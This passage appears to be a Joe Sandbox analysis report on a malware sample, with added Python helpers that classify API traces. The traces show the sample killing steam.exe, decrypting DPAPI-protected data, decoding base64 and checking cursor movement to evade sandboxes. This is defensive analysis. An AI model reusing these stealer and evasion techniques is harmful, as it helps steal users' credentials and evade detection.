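def parse_block(text: str) -> List[ApiCall]:
    """Turn one annotation block into ApiCall records; reject lines that do not fit."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised annotation line: {line!r}")
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def compared_literals(calls: List[ApiCall]) -> List[str]:
    """Second and later operands of StrCmp* calls that the report resolved to a string."""
    found = []
    for c in calls:
        if c.api.startswith("StrCmp"):
            found += [a for a in c.args[1:] if a != "?" and not POINTER_RE.fullmatch(a)]
    return found


def classify(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Heuristic labels for one block (the heuristics are this example's, not the report's)."""
    apis = {c.api for c in calls}
    by_api = {c.api: c for c in calls}
    findings = []
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= apis:
        detail = "process list walk"
        flags = int(by_api["CreateToolhelp32Snapshot"].args[0], 16)
        entry_size = int(by_api["Process32First"].args[1], 16)
        if flags & TH32CS_SNAPPROCESS and entry_size == SIZEOF_PROCESSENTRY32A:
            detail += " (TH32CS_SNAPPROCESS, ANSI PROCESSENTRY32)"
        targets = compared_literals(calls)
        if targets:
            detail += ", compares each entry against " + ", ".join(targets)
        findings.append(("process_enumeration", detail))
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= apis:
        detail = "directory enumeration loop"
        if "CopyFileA" in apis:
            detail += ", CopyFileA reachable from the loop (file harvesting)"
        findings.append(("file_enumeration", detail))
    return findings


if __name__ == "__main__":
    for name, block in (("process walk", PROCESS_WALK), ("file walk", FILE_WALK)):
        for label, detail in classify(parse_block(block)):
            print(f"{name}: {label}: {detail}")
```

Two details of the annotated calls are worth keeping in mind when reading the classifier's output. StrCmpCA is the case-sensitive SHLWAPI comparison (StrCmpICA is the case-insensitive one) and returns 0 on a match, so the loop only recognises a process whose PROCESSENTRY32.szExeFile is exactly "steam.exe". The dwSize of 0x128 passed to Process32First/Process32Next is the size of the ANSI PROCESSENTRY32, which is consistent with the "A" suffixed string APIs used throughout this function.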
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
• String ID: steam.exe
• API String ID: 1799959500-2826358650
• Opcode ID: 59e16966234c636198ad156ac228ca2d305017bfaf873b907e36991a0411e197
• Instruction ID: 12e802c199a70a7654b785d1593c0d911f85a936e6d09ab4583338249bf56bed
• Opcode Fuzzy Hash: 59e16966234c636198ad156ac228ca2d305017bfaf873b907e36991a0411e197
• Instruction Fuzzy Hash: B901287090122D9FEB719B64DC08BEEB7B8AF45350F4081A6A649E3194DB348F41DF20
APIs
• OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00FE1813
• SetThreadDesktop.USER32(00000000), ref: 00FE181A
• GetCursorPos.USER32(?), ref: 00FE182A
• Sleep.KERNEL32(000003E8), ref: 00FE183A
• GetCursorPos.USER32(?), ref: 00FE1849
• Sleep.KERNEL32(00002710), ref: 00FE185B
• Sleep.KERNEL32(000003E8), ref: 00FE1860
• GetCursorPos.USER32(?), ref: 00FE186F
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: CursorSleep$Desktop$InputOpenThread
• String ID:
• API String ID: 3283940658-0
• Opcode ID: 9649ffa881f5be0df8615e40b5f4a1b9755aa62a4f14d5c37dd4c5614dc9f124
• Instruction ID: d0fdc591243f614103eda825904eb6de451e29060a40800ddd862b081269ae41
• Opcode Fuzzy Hash: 9649ffa881f5be0df8615e40b5f4a1b9755aa62a4f14d5c37dd4c5614dc9f124
• Instruction Fuzzy Hash: 3F113D31E0024AEBDB20DBA6CD49BBE7BB8BF00312F244565D505A2090D774AB40EB60
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,10000000), ref: 00FF2A0A
• Process32First.KERNEL32(00000000,00000128), ref: 00FF2A1A
• StrCmpCA.SHLWAPI(?,?), ref: 00FF2A33
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FF2A46
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00FF2A55
• CloseHandle.KERNEL32(00000000), ref: 00FF2A5C
• Process32Next.KERNEL32(00000000,00000128), ref: 00FF2A6A
• CloseHandle.KERNEL32(00000000), ref: 00FF2A75
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2696918072-0
                                                                                                                                                                                                                                                          • Opcode ID: 5313a131151334090f75a6deff9f392a3bd26d638c39d7490dae5eaa91943a10
                                                                                                                                                                                                                                                          • Instruction ID: c7bf04179519a6494a666ce8e4770c46a312abb668dcab552bccecebd607a979
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5313a131151334090f75a6deff9f392a3bd26d638c39d7490dae5eaa91943a10
• Instruction Fuzzy Hash: 70114831A0121DAFDB719F64EC49BEE7BB8AF49B11F008095FB05E2144DB789A459B50
APIs
• _memset.LIBCMT ref: 00FEA94E
• lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEA969
• CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FEA971
• _memmove.LIBCMT ref: 00FEA9F4
• lstrcatA.KERNEL32(0101580E,01015812,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA1E
• lstrcatA.KERNEL32(0101580E,01015813,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA34
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
• String ID:
• API String ID: 943939369-0
• Opcode ID: 621ca69d8928ee1d808808fa292a5cb44b118f4642f06571e579f8a4a9939856
• Instruction ID: 320f3f16935b5638c642e0db2ad08129719a052a0b67b75097d854e49414e3bc
• Opcode Fuzzy Hash: 621ca69d8928ee1d808808fa292a5cb44b118f4642f06571e579f8a4a9939856
• Instruction Fuzzy Hash: B7318FB1D0021AAFDB219F65EE849FEB7BCAF18700F4040B6F509E2144D7785E449F62
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00FF295B
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF297A
• Process32First.KERNEL32(00000000,00000128), ref: 00FF298A
• Process32Next.KERNEL32(00000000,00000128), ref: 00FF299C
• StrCmpCA.SHLWAPI(?), ref: 00FF29AE
• CloseHandle.KERNEL32(00000000), ref: 00FF29C2
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
• String ID:
• API String ID: 1799959500-0
• Opcode ID: 85a3f9489a0df32c9959e5ded4d8cdb0f71a92bfe076b1737f891084f74fca8c
• Instruction ID: 5e3511a8d88a406d1c2caee4f8d644a8f996548cc73c0e97842581a52bed4e30
• Opcode Fuzzy Hash: 85a3f9489a0df32c9959e5ded4d8cdb0f71a92bfe076b1737f891084f74fca8c
• Instruction Fuzzy Hash: CE018C3190412E9FEB719F64AC08BEE7AB8AF05300F0080E5EA09E3184DAB48B41DF61
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0100B1D5,?,01007F86,?,000000BC,?), ref: 0100ABAB
• GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0100B1D5,?,01007F86,?,000000BC,?), ref: 0100ABD4
• GetACP.KERNEL32(?,?,0100B1D5,?,01007F86,?,000000BC,?), ref: 0100ABE8
Strings
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                          • Opcode ID: fef6d2212b98e5f859497d40cd3077ca1c6b020bca395c0eccf3e13f297fcb14
                                                                                                                                                                                                                                                          • Instruction ID: 2d22fefb8956433e8e8cf13d1cb9c8e97df275c76f63d6300999ee21dab05a6f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fef6d2212b98e5f859497d40cd3077ca1c6b020bca395c0eccf3e13f297fcb14
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F01D831704B0BFAFB739B55EC05F9A37EAAF01374F100499F681E60C2E764CA41A654
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6CD5144F,?,00001000,?,6CD4981A,FFFFFFFF,?,6CD5144F,?,?), ref: 6CD51645
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,6CD5144F), ref: 6CD51675
• WriteConsoleW.KERNEL32(?,?,00000001,6CD5144F,00000000,?,6CD5144F), ref: 6CD516C6
• GetLastError.KERNEL32(?,6CD5144F), ref: 6CD518E3
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ConsoleWrite$ByteCharErrorLastMultiWide
• String ID:
• API String ID: 3036337926-0
• Opcode ID: c0bdd2988121c23dcc74e11db2a1f075ef1939fd1c3cb9335469458dcae7d954
• Instruction ID: e502d7e61cba89f25dd038c43e37a0c2b1bdbb12a58021f7efaa855c00a4c04b
• Opcode Fuzzy Hash: c0bdd2988121c23dcc74e11db2a1f075ef1939fd1c3cb9335469458dcae7d954
• Instruction Fuzzy Hash: 02917A309287816AFB124F38D8017AAFB68AFD3384F54D71EF698728A0FB31C5958715
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: \u$\u${${$}$}
• API String ID: 0-582841131
• Opcode ID: 2bbc80fab093bc2304ffffcdd14150d825846d3a58e3c70a3df44792b39cf733
• Instruction ID: b719becf2e75954d8a5c1c3911c0a5e00ef546c1d0e12da5883f6435ae0d3525
• Opcode Fuzzy Hash: 2bbc80fab093bc2304ffffcdd14150d825846d3a58e3c70a3df44792b39cf733
• Instruction Fuzzy Hash: 22417E27D1A7CED5CB018BB484602AEBFB26FD6204F5D429AC4D81F382D3358157D3A5
APIs
• IsDebuggerPresent.KERNEL32 ref: 00FFCEEC
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFCF01
• UnhandledExceptionFilter.KERNEL32(01012344), ref: 00FFCF0C
• GetCurrentProcess.KERNEL32(C0000409), ref: 00FFCF28
• TerminateProcess.KERNEL32(00000000), ref: 00FFCF2F
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 3153ac94b871d0b32febdfd22bd73f40028c47d62ba50007afd5d0807a93b4be
• Instruction ID: 42ea4f3300f4f501c0178c6bd302a036f7ba9653266b07cffdbe3a6f38751403
• Opcode Fuzzy Hash: 3153ac94b871d0b32febdfd22bd73f40028c47d62ba50007afd5d0807a93b4be
• Instruction Fuzzy Hash: 5D2103B880020ACFD332DF65F5847987BB4FB09310F40846AE69887359DBBE69809F91
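The five calls listed for the function at 00FFCEEC are, in this order, the body of MSVC's compiler-generated stack-cookie (/GS) failure handler, `__raise_securityfailure`, which `__report_gsfailure` calls when a cookie check fails: it queries IsDebuggerPresent, clears the top-level filter with SetUnhandledExceptionFilter(NULL), reports the fault through UnhandledExceptionFilter, and ends the process via GetCurrentProcess and TerminateProcess; the C0000409 visible on the stack at the GetCurrentProcess call is STATUS_STACK_BUFFER_OVERRUN, the exit code that handler passes to TerminateProcess. The IsDebuggerPresent call in this function is therefore runtime boilerplate present in practically every /GS-compiled binary and is not, on its own, evidence of deliberate anti-debugging. The script below is an added triage example written for this report, not Joe Sandbox output or code from the sample: it parses API lines in the format used on this page and separates that handler from an IsDebuggerPresent call that deserves a manual look. The first two traces are copied from the entries on this page; the third is a constructed contrast case, and the verdict labels and helper names are this example's own.

```python
"""Added triage helper (not part of the Joe Sandbox report): parse a
function entry's "Name.MODULE(args), ref: ADDR" lines and tell the MSVC
/GS failure handler apart from a possibly deliberate IsDebuggerPresent check."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Matches lines such as "• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFCF01"
# and argument-less ones such as "• IsDebuggerPresent.KERNEL32 ref: 00FFCEEC".
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>[\w.-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

STATUS_STACK_BUFFER_OVERRUN = 0xC0000409  # exit code the /GS handler passes to TerminateProcess

# Call order of vcruntime's __raise_securityfailure (reached from __report_gsfailure).
GS_FAILURE_SEQUENCE = ("IsDebuggerPresent", "SetUnhandledExceptionFilter",
                       "UnhandledExceptionFilter", "GetCurrentProcess", "TerminateProcess")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int  # call-site address inside the dumped image


def hex_arg(text: str) -> Optional[int]:
    """Joe Sandbox prints '?' for arguments it could not resolve; those stay unknown."""
    try:
        return int(text, 16)
    except ValueError:
        return None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse one function entry's API lines, ordered by call-site address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as "APIs" or "Memory Dump Source"
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["module"].upper(), args, int(m["ref"], 16)))
    return sorted(calls, key=lambda c: c.ref)


def is_subsequence(needle, haystack) -> bool:
    """True if every item of needle occurs in haystack in the same relative order."""
    it = iter(haystack)
    return all(any(item == wanted for item in it) for wanted in needle)


def classify(calls: List[ApiCall]) -> Tuple[str, List[str]]:
    """Return (verdict, evidence) for one function's API list."""
    names = [c.api for c in calls]
    evidence: List[str] = []
    if "IsDebuggerPresent" not in names:
        return "no_debugger_check", evidence
    if is_subsequence(GS_FAILURE_SEQUENCE, names):
        evidence.append(" -> ".join(GS_FAILURE_SEQUENCE))
        if any(c.api == "SetUnhandledExceptionFilter" and c.args
               and hex_arg(c.args[0]) == 0 for c in calls):
            evidence.append("SetUnhandledExceptionFilter(NULL) clears the top-level filter first")
        if any(hex_arg(a) == STATUS_STACK_BUFFER_OVERRUN for c in calls for a in c.args):
            evidence.append("STATUS_STACK_BUFFER_OVERRUN (0xC0000409) on the stack")
        return "crt_gs_failure_handler", evidence
    evidence.append("IsDebuggerPresent outside the /GS handler sequence: review manually")
    return "isdebuggerpresent_review", evidence


# Copied from the function entry at 00FFCEEC on this page.
GS_FAILURE_TRACE = """
• IsDebuggerPresent.KERNEL32 ref: 00FFCEEC
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFCF01
• UnhandledExceptionFilter.KERNEL32(01012344), ref: 00FFCF0C
• GetCurrentProcess.KERNEL32(C0000409), ref: 00FFCF28
• TerminateProcess.KERNEL32(00000000), ref: 00FFCF2F
"""

# Copied from the console-write function entry at 6CD51645 on this page.
CONSOLE_TRACE = """
• MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6CD5144F,?,00001000,?,6CD4981A,FFFFFFFF,?,6CD5144F,?,?), ref: 6CD51645
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,6CD5144F), ref: 6CD51675
• GetLastError.KERNEL32(?,6CD5144F), ref: 6CD518E3
"""

# Constructed contrast case, not taken from this report: a check that exits when debugged.
ANTIDEBUG_TRACE = """
• IsDebuggerPresent.KERNEL32 ref: 00401010
• ExitProcess.KERNEL32(00000001), ref: 00401020
"""

if __name__ == "__main__":
    for label, trace in (("00FFCEEC", GS_FAILURE_TRACE), ("6CD51645", CONSOLE_TRACE),
                         ("constructed", ANTIDEBUG_TRACE)):
        verdict, evidence = classify(parse_api_lines(trace))
        print(f"{label}: {verdict}")
        for item in evidence:
            print(f"  - {item}")
```

The `ref` column is the call-site address inside the dumped image, so sorting by it reproduces call order regardless of how the report lists the calls; `?` arguments are values the sandbox could not resolve and are left unknown rather than guessed. The same check applies unchanged to the 64-bit handler, which has the same call sequence.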
APIs
• WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CD4F03E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressSingleWake
                                                                                                                                                                                                                                                          • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $main
                                                                                                                                                                                                                                                          • API String ID: 3114109732-896199136
                                                                                                                                                                                                                                                          • Opcode ID: 88c682cc5ddd243fae4807124f125fa07f28134be6b53f88adc7c657c2767b4e
                                                                                                                                                                                                                                                          • Instruction ID: 8f0f54f73a4a3661ecdacdb2b71ce2af5addd4762d851b75f5fdb8ee68ebaa1d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88c682cc5ddd243fae4807124f125fa07f28134be6b53f88adc7c657c2767b4e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FD11674600A40DFE721CF29C484B52B7F1BB49308F14896EDA9A8BFA1D735E549CBA0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00FE8889), ref: 00FE8712
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00FE8889,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8726
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00FECD1F,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE874B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
